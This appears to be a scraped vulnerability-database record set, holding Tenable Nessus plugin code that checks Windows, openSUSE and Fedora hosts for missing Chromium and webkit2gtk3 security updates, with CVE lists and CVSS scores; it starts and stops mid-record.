script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/10/16\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/10/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/10/16\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:google:chrome\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"google_chrome_installed.nasl\");\n script_require_keys(\"SMB/Google_Chrome/Installed\");\n\n exit(0);\n}\n\ninclude(\"google_chrome_version.inc\");\n\nget_kb_item_or_exit(\"SMB/Google_Chrome/Installed\");\ninstalls = get_kb_list(\"SMB/Google_Chrome/*\");\n\ngoogle_chrome_check_version(installs:installs, fix:'70.0.3538.67', severity:SECURITY_WARNING, xss:FALSE, xsrf:FALSE);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T15:16:00", "description": "This update for Chromium to version 70.0.3538.67 fixes multiple issues.\n\nSecurity issues fixed (bsc#1112111) :\n\n - CVE-2018-17462: Sandbox escape in AppCache\n\n - CVE-2018-17463: Remote code execution in V8\n\n - Heap buffer overflow in Little CMS in PDFium\n\n - CVE-2018-17464: URL spoof in Omnibox\n\n - CVE-2018-17465: Use after free in V8\n\n - CVE-2018-17466: Memory corruption in Angle\n\n - CVE-2018-17467: URL spoof in Omnibox\n\n - CVE-2018-17468: Cross-origin URL disclosure in Blink\n\n - CVE-2018-17469: Heap buffer overflow in PDFium\n\n - CVE-2018-17470: Memory corruption in GPU Internals\n\n - CVE-2018-17471: Security UI occlusion in full screen mode\n\n - CVE-2018-17473: URL spoof in Omnibox\n\n - CVE-2018-17474: Use after free in Blink\n\n - CVE-2018-17475: URL spoof in Omnibox\n\n - CVE-2018-17476: Security UI occlusion in full screen mode\n\n - CVE-2018-5179: Lack of limits on update() in ServiceWorker\n\n - CVE-2018-17477: UI spoof in Extensions VAAPI hardware accelerated rendering is now enabled by default.\n\nThis update contains the following packaging changes :\n\n - Use the system libusb-1.0 library\n\n - Use bundled harfbuzz library\n\n - Disable gnome-keyring to avoid crashes", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-03-27T00:00:00", "type": "nessus", "title": "openSUSE Security Update : Chromium (openSUSE-2019-712)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17472", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:chromedriver", "p-cpe:/a:novell:opensuse:chromedriver-debuginfo", "p-cpe:/a:novell:opensuse:chromium", "p-cpe:/a:novell:opensuse:chromium-debuginfo", "p-cpe:/a:novell:opensuse:chromium-debugsource", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-712.NASL", "href": "https://www.tenable.com/plugins/nessus/123310", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-712.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(123310);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n \"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17472\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\",\n \"CVE-2018-5179\"\n );\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"openSUSE Security Update : Chromium (openSUSE-2019-712)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for Chromium to version 70.0.3538.67 fixes multiple\nissues.\n\nSecurity issues fixed (bsc#1112111) :\n\n - CVE-2018-17462: Sandbox escape in AppCache\n\n - CVE-2018-17463: Remote code execution in V8\n\n - Heap buffer overflow in Little CMS in PDFium\n\n - CVE-2018-17464: URL spoof in Omnibox\n\n - CVE-2018-17465: Use after free in V8\n\n - CVE-2018-17466: Memory corruption in Angle\n\n - CVE-2018-17467: URL spoof in Omnibox\n\n - CVE-2018-17468: Cross-origin URL disclosure in Blink\n\n - CVE-2018-17469: Heap buffer overflow in PDFium\n\n - CVE-2018-17470: Memory corruption in GPU Internals\n\n - CVE-2018-17471: Security UI occlusion in full screen\n mode\n\n - CVE-2018-17473: URL spoof in Omnibox\n\n - CVE-2018-17474: Use after free in Blink\n\n - CVE-2018-17475: URL spoof in Omnibox\n\n - CVE-2018-17476: Security UI occlusion in full screen\n mode\n\n - CVE-2018-5179: Lack of limits on update() in\n ServiceWorker\n\n - CVE-2018-17477: UI spoof in Extensions VAAPI hardware\n accelerated rendering is now enabled by default.\n\nThis update contains the following packaging changes :\n\n - Use the system libusb-1.0 library\n\n - Use bundled harfbuzz library\n\n - Disable gnome-keyring to avoid crashes\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1112111\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected Chromium packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17474\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/11/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/03/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/03/27\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromedriver-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:chromium-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(x86_64)$\") audit(AUDIT_ARCH_NOT, \"x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-70.0.3538.67-lp150.2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromedriver-debuginfo-70.0.3538.67-lp150.2.20.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-70.0.3538.67-lp150.2.20.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debuginfo-70.0.3538.67-lp150.2.20.1\", allowmaj:TRUE) ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"chromium-debugsource-70.0.3538.67-lp150.2.20.1\", allowmaj:TRUE) ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_warning(port:0, extra:rpm_report_get());\n else security_warning(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromedriver / chromedriver-debuginfo / chromium / etc\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-06-09T15:04:37", "description": "Update to chromium 70.0.3538.77. Fixes CVE-2018-16435 CVE-2018-17462 CVE-2018-17463 CVE-2018-17464 CVE-2018-17465 CVE-2018-17466 CVE-2018-17467 CVE-2018-17468 CVE-2018-17469 CVE-2018-17470 CVE-2018-17471 CVE-2018-17473 CVE-2018-17474 CVE-2018-17475 CVE-2018-17476 CVE-2018-5179 CVE-2018-17477\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-01-03T00:00:00", "type": "nessus", "title": "Fedora 29 : chromium (2018-34f7f68029)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2018-16435", "CVE-2018-17462", "CVE-2018-17463", "CVE-2018-17464", "CVE-2018-17465", "CVE-2018-17466", "CVE-2018-17467", "CVE-2018-17468", "CVE-2018-17469", "CVE-2018-17470", "CVE-2018-17471", "CVE-2018-17472", "CVE-2018-17473", "CVE-2018-17474", "CVE-2018-17475", "CVE-2018-17476", "CVE-2018-17477", "CVE-2018-5179"], "modified": "2022-06-08T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:chromium", "cpe:/o:fedoraproject:fedora:29"], "id": "FEDORA_2018-34F7F68029.NASL", "href": "https://www.tenable.com/plugins/nessus/120342", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory FEDORA-2018-34f7f68029.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(120342);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/06/08\");\n\n script_cve_id(\n \"CVE-2018-16435\",\n \"CVE-2018-17462\",\n \"CVE-2018-17463\",\n \"CVE-2018-17464\",\n \"CVE-2018-17465\",\n \"CVE-2018-17466\",\n \"CVE-2018-17467\",\n \"CVE-2018-17468\",\n \"CVE-2018-17469\",\n \"CVE-2018-17470\",\n \"CVE-2018-17471\",\n \"CVE-2018-17472\",\n \"CVE-2018-17473\",\n \"CVE-2018-17474\",\n \"CVE-2018-17475\",\n \"CVE-2018-17476\",\n \"CVE-2018-17477\",\n \"CVE-2018-5179\"\n );\n script_xref(name:\"FEDORA\", value:\"2018-34f7f68029\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/06/22\");\n\n script_name(english:\"Fedora 29 : chromium (2018-34f7f68029)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Fedora host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"Update to chromium 70.0.3538.77. Fixes CVE-2018-16435 CVE-2018-17462\nCVE-2018-17463 CVE-2018-17464 CVE-2018-17465 CVE-2018-17466\nCVE-2018-17467 CVE-2018-17468 CVE-2018-17469 CVE-2018-17470\nCVE-2018-17471 CVE-2018-17473 CVE-2018-17474 CVE-2018-17475\nCVE-2018-17476 CVE-2018-5179 CVE-2018-17477\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora update system website.\nTenable has attempted to automatically clean and format it as much as\npossible without introducing additional issues.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bodhi.fedoraproject.org/updates/FEDORA-2018-34f7f68029\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected chromium package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:F/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-17474\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Google Chrome 67, 68 and 69 Object.create exploit');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/09/04\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/11/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/01/03\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:chromium\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:29\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Fedora Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2019-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = pregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^29([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 29\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"FC29\", reference:\"chromium-70.0.3538.77-4.fc29\")) flag++;\n\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_WARNING,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"chromium\");\n}\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-02-19T13:49:50", "description": "This update for webkit2gtk3 to version 2.24.1 fixes the following issues :\n\nSecurity issues fixed :\n\n - CVE-2019-6201, CVE-2019-6251, CVE-2019-7285, CVE-2019-7292, CVE-2019-8503, CVE-2019-8506, CVE-2019-8515, CVE-2019-8518, CVE-2019-8523, CVE-2019-8524, CVE-2019-8535, CVE-2019-8536, CVE-2019-8544, CVE-2019-8551, CVE-2019-8558, CVE-2019-8559, CVE-2019-8563, CVE-2019-11070 (bsc#1132256). This update was imported from the SUSE:SLE-15:Update update project.", "cvss3": {"score": 8.8, "vector": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2019-05-13T00:00:00", "type": "nessus", "title": "openSUSE Security Update : webkit2gtk3 (openSUSE-2019-1374)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2019-11070", "CVE-2019-6201", "CVE-2019-6251", "CVE-2019-7285", "CVE-2019-7292", "CVE-2019-8503", "CVE-2019-8506", "CVE-2019-8515", "CVE-2019-8518", "CVE-2019-8523", "CVE-2019-8524", "CVE-2019-8535", "CVE-2019-8536", "CVE-2019-8544", "CVE-2019-8551", "CVE-2019-8558", "CVE-2019-8559", "CVE-2019-8563"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo", "p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang", "p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0", "p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0", "p-cpe:/a:novell:opensuse:webkit-jsc-4", "p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles", "p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource", "p-cpe:/a:novell:opensuse:webkit2gtk3-devel", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser", "p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2", "p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo", "cpe:/o:novell:opensuse:15.0"], "id": "OPENSUSE-2019-1374.NASL", "href": "https://www.tenable.com/plugins/nessus/124851", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2019-1374.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(124851);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2019-11070\", \"CVE-2019-6201\", \"CVE-2019-6251\", \"CVE-2019-7285\", \"CVE-2019-7292\", \"CVE-2019-8503\", \"CVE-2019-8506\", \"CVE-2019-8515\", \"CVE-2019-8518\", \"CVE-2019-8523\", \"CVE-2019-8524\", \"CVE-2019-8535\", \"CVE-2019-8536\", \"CVE-2019-8544\", \"CVE-2019-8551\", \"CVE-2019-8558\", \"CVE-2019-8559\", \"CVE-2019-8563\");\n\n script_name(english:\"openSUSE Security Update : webkit2gtk3 (openSUSE-2019-1374)\");\n script_summary(english:\"Check for the openSUSE-2019-1374 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update for webkit2gtk3 to version 2.24.1 fixes the following\nissues :\n\nSecurity issues fixed :\n\n - CVE-2019-6201, CVE-2019-6251, CVE-2019-7285,\n CVE-2019-7292, CVE-2019-8503, CVE-2019-8506,\n CVE-2019-8515, CVE-2019-8518, CVE-2019-8523,\n CVE-2019-8524, CVE-2019-8535, CVE-2019-8536,\n CVE-2019-8544, CVE-2019-8551, CVE-2019-8558,\n CVE-2019-8559, CVE-2019-8563, CVE-2019-11070\n (bsc#1132256). This update was imported from the\n SUSE:SLE-15:Update update project.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1132256\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected webkit2gtk3 packages.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:POC/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:P/RL:O/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libjavascriptcoregtk-4_0-18-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk-4_0-37-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwebkit2gtk3-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-JavaScriptCore-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:typelib-1_0-WebKit2WebExtension-4_0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit-jsc-4-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk-4_0-injected-bundles-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-minibrowser-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:webkit2gtk3-plugin-process-gtk2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.0\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2019/01/14\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2019/05/10\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2019/05/13\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2019-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.0)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.0\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libjavascriptcoregtk-4_0-18-debuginfo-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk-4_0-37-debuginfo-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"libwebkit2gtk3-lang-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-JavaScriptCore-4_0-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2-4_0-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"typelib-1_0-WebKit2WebExtension-4_0-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit-jsc-4-debuginfo-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk-4_0-injected-bundles-debuginfo-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-debugsource-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-devel-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", reference:\"webkit2gtk3-minibrowser-2.24.1-lp150.2.19.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.0\", 